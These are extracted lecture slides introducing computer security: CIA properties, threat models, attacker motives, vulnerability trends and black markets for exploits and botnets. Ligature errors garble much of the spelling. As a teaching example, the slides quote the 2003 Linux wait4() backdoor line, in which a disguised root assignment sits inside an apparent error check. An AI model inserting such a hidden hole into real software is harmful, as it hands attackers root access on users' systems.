Introduc/on Security Analysis & Threat Models Dawn Song Administrivia •  Piazza – Primary point of contact •  Course text book – None! •  No office hours, discussion this week –  Starts Sept 5th •  If you cant make discussion… •  No lecture next Monday, Sept 3rd Dawn Song What is Computer Security? •  Allow intended use of computer systems •  Prevent unintended use that may cause harm Dawn Song Personal Data & Files Grant authorized users access to read, create personal files Prevent unauthorized users from reading, modify, or dele/ng personal Dawn Song Banking Funds Allow customer to view balance, transfer funds, make payments Prevent third party access to account; customers defrauding bank Prevent other browser tabs, applica/ons from reading banking info Dawn Song Personal Privacy Allow friends to view status updates, photos, loca/on data Prevent strangers, adver/sers from accessing profile Prevent strangers, applica/ons from pos/ng updates as you Dawn Song Threats Dawn Song Explora/on, Disrup/on, Personal Reputa/on •  1990s: –  Phone phreaking, free calls •  Early 2000s: –  Email worms –  CodeRed, MyDoom, Sobig Dawn Song Financially Mo/vated •  ShiZ in late 2000s •  Spam –  Pharmaceu/cals –  Fake products •  Carding/Fraud –  Iden/fy theZ, credit fraud Dawn Song Poli/cally Mo/vated •  Stuxnet, Flame, Gauss –  Iranian nuclear infrastructure –  Lebanese banking informa/on –  Wiretapping Dawn Song Poli/cally Mo/vated Dawn Song Other Mo/ves? Dawn Song Current Vulnerability Trends Dawn Song MITRE tracks vulnerability disclosures Cumula/ve Disclosures Percentage from Web applica/ons 2010 Source: IBM X-­‐Force, Mar 2011 Data: hap://cve.mitre.org/ Dawn Song Opera/ng system vulnerabili/es Dawn Song Trends in client-­‐side vulnerabili/es browser security improving primarily Flash, aZer 2008 Source: IBM X-­‐Force, Mar 2011 Dawn Song Reported Web Vulnerabili/es "In the Wild" Data from aggregator and validator of NVD-reported vulnerabilities
Dawn Song Web vs System vulnerabili/es XSS peak
Dawn Song Mobile Opera/ng Systems Mobile OS Vulnerabili/es Mobile OS Exploits Compare number of vulnerabili/es with exploits. What can you expect next year? Source: IBM X-­‐Force, Mar 2011 Dawn Song Summary •  Many current aaacks are financially mo/vated •  Vulnerabili/es prevalent, half related to the Web –  Browser vulnerabili/es decreasing, but plug-­‐ins pose risk –  Some improvements in defending against common aaacks •  Mobile plaeorms receiving increasing aaen/on Dawn Song Payloads Dawn Song Why own machines: 1. IP address and bandwidth stealing Aaacker’s goal: look like a random Internet user Use the infected machine’s IP address for: •  Spam (e.g. the storm botnet) Spamaly/cs: 1:12M pharma spams leads to purchase 1:260K gree/ng card spams leads to infec/on
•  Denial of Service: Services: 1 hour (20$), 24 hours (100$) •  Click fraud (e.g. Clickbot.a) Dawn Song Why own machines: 2. Steal user creden/als keylog for banking passwords, web passwords, gaming pwds. Example: SilentBanker (2007) User requests login page Malware injects Javascript When user submits informa/on, also sent to aaacker Bank sends login page needed to log in Bank Similar mechanism used by Zeus botnet Dawn Song Why own machines: 3. Spread to isolated systems Example: Stuxtnet Windows infec/on ⇒ Siemens PCS 7 SCADA control soZware on Windows ⇒ Siemens device controller on isolated network More on this later in course Dawn Song Server-­‐side aaacks •  Financial data theZ: oZen credit card numbers –  example: malicious soZware installed on servers of a single retailer stole 45M credit card (2007) •  Poli/cal mo/va/on: Aurora, Tunisia Facebook (Feb. 2011) •  Infect visi/ng users Dawn Song Example: Mpack
(2007)
•  PHP-­‐based tools installed on compromised web sites –  Embedded as an iframe on infected page –  Infects browsers that visit site •  Features –  management console provides stats on infec/on rates –  Sold for several 100$ –  Customer care can be purchased, one-­‐year support contract •  Impact: 500,000 infected sites (compromised via SQL injec/on) –  Several defenses: e.g. Google safe browsing Dawn Song Insider aaacks: example Hidden trap door in Linux (nov 2003) –  Allows aaacker to take over a computer –  Prac/cally undetectable change (uncovered via CVS logs) Inserted line in wait4() if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
!
Looks like a standard error check, but … See: http://lwn.net/Articles/57135/
Dawn Song Many more examples •  Access to SIPRnet and a CD-­‐RW: 260,000 cables ⇒ Wikileaks •  SysAdmin for city of SF government. Changed passwords, locking out city from router access •  Inside logic bomb took down 2000 UBS servers Dawn Song Mone/za/on Dawn Song Marketplace for Vulnerabili/es Op9on 1: bug bounty programs •  Google Vulnerability Reward Program: 3K $ •  Mozilla Bug Bounty program: 500$ •  Pwn2Own compe//on: 15K $ Op9on 2: •  ZDI, iDefense: 2K – 25K $ Dawn Song Marketplace for Vulnerabili/es Op9on 3: black market Source: Charlie Miller (securityevaluators.com/files/papers/0daymarket.pdf) Dawn Song Marketplace for owned machines clients spam keylogger bot Pay-­‐per-­‐install (PPI) services PPI service PPI opera9on: 1.  Own vic/m’s machine 2.  Download and install client’s code Vic9ms 3.
Charge lient Source: Cabalerro c
et al. (www.icir.org/vern/papers/ppi-­‐usesec11.pdf) Dawn Song Marketplace for owned machines clients Cost: US -­‐ 100-­‐180$ / 1000 machines Asia -­‐ 7-­‐8$ / 1000 machines spam bot keylogger PPI service Vic9ms Source: Cabalerro et al. (www.icir.org/vern/papers/ppi-­‐usesec11.pdf) Dawn Song The computer security problem Two factors: •  Lots of buggy soNware (and gullible users) •  Money can be made from finding and exploi9ng vulns. 1.  Marketplace for vulnerabili/es 2.  Marketplace for owned machines (PPI) 3.  Many methods to profit from owned client machines current state of computer security Dawn Song Formally Defining Security Dawn Song What is Computer Security About? •  General goals: –  Allow intended use of computer systems –  Prevent unintended use that may cause harm •  More precisely… Dawn Song Basic Security Proper/es (I) •  Confiden/ality: –  Informa/on is only disclosed to authorized people or systems –  E.g., aaackers cannot learn your banking info Dawn Song Basic Security Proper/es (II) •  Integrity: –  Informa/on cannot be tampered with in an unauthorized way –  E.g., aaacker cannot change the balance of your bank account Dawn Song Basic Security Proper/es (III) •  Availability: –  Informa/on and services are accessible in a /mely fashion to authorized people or systems –  E.g., you should be able to login and perform transac/ons on your online banking account when you want to Dawn Song Basic Security Proper/es: CIA • Confiden9ality • Integrity • Availability Dawn Song Security Analysis •  Given a computer system, one may ask: Is the computer system secure? Dawn Song Is the House Secure? Dawn Song It Depends … •  What are the assets? What are the goals? Dawn Song It Depends … •  Threat model –
–
–
–
–
In SafeLand, you don’t need to lock the door Aaackers who pick locks Aaackers who drive a bull-­‐dozer Aaackers who have super advanced technology Aaackers who may know you well Dawn Song Is the House Secure? •  Is the house’s protec/on mechanism strong enough to protect the assets from aaackers in a certain threat model? Dawn Song Which Threat Model Should You Choose? ?
Dawn Song Cost of Security •  Should you always build & evaluate a system secure against the strongest aaacker? –  A student may simply not be able to afford an alarm system •  Not about perfect security Perfect Risk Analysis Security Dawn Song Is the Computer System Secure? •  Is the system’s protec/on mechanism strong enough to protect the assets & achieve security goals against aaackers in a certain threat model? Dawn Song Key Elements to Security Analysis Security proper/es Security Analysis ? Threat Model Dawn Song Threat Model •  Assump/ons on aaackers’ abili/es and resources 0Day Network Eavesdropper DDoS MITM Aaack DES Cracker Dawn Song Which Threat Models to Choose? •
•
•
•
For the grade database system for your class? For your phone? For a major online banking site? For the system to control nuclear weapon launch? Dawn Song Cost of Security •  There’s no free lunch. •  There’s no free security. •  Cost of security –  Expensive to develop –  Performance overhead –  Inconvenience to users Dawn Song Priori/ze Your Security Solu/on according to Your Threat Model •  No one wants to pay more for security than what they have to lose •  Not about perfect security Perfect Security Risk Analysis –  Risk analysis Dawn Song Changing Threat Model •  Be careful when your threat model changes –  E.g., online account Over /me…. New account, nothing of value; No incen/ve for aaackers Account accumulates value; More incen/ve for aaackers Dawn Song Design Impacts Cost of Security •  Good system design & architecture can reduce cost of security Dawn Song Design Impacts Cost of Security Known unpatched vulnerabili/es Browser Google Chrome 16 Internet Explorer 6 Internet Explorer 7 Internet Explorer 8 Internet Explorer 9 Firefox 3.6 Firefox 9 Opera 11 Safari 5 Secunia SecurityFocus Extremely cri/cal Highly cri/cal Moderately cri/cal Less cri/cal Not cri/cal Total (number / oldest) (number / oldest) (number / oldest) (number / oldest) (number / oldest) (number / oldest) 1 0 0 0 0 0 13 December 2011 4 8 12 534 0 0 17 November 2004 27 February 2004 5 June 2003 20 November 2000 1 4 9 213 0 0 30 October 2006 6 June 2006 5 June 2003 15 August 2006 1 7 123 0 0 0 26 February 2007 5 June 2003 14 January 2009 1 26 0 0 0 0 6 December 2011 5 March 2011 1 0 0 0 0 0 20 December 2011 0 0 0 0 0 0 1 2 0 0 0 0 6 December 2011 6 December 2011 1 2 0 0 0 0 8 June 2010 13 December 2011 "Vulnerabili/es." SecurityFocus. Web. 18 Jan. 2012. <hap://www.securityfocus.com/>. "Advisories." Secunia. Web. 18 Jan. 2012. <haps://secunia.com/community/advisories/>. Dawn Song End of Segment Dawn Song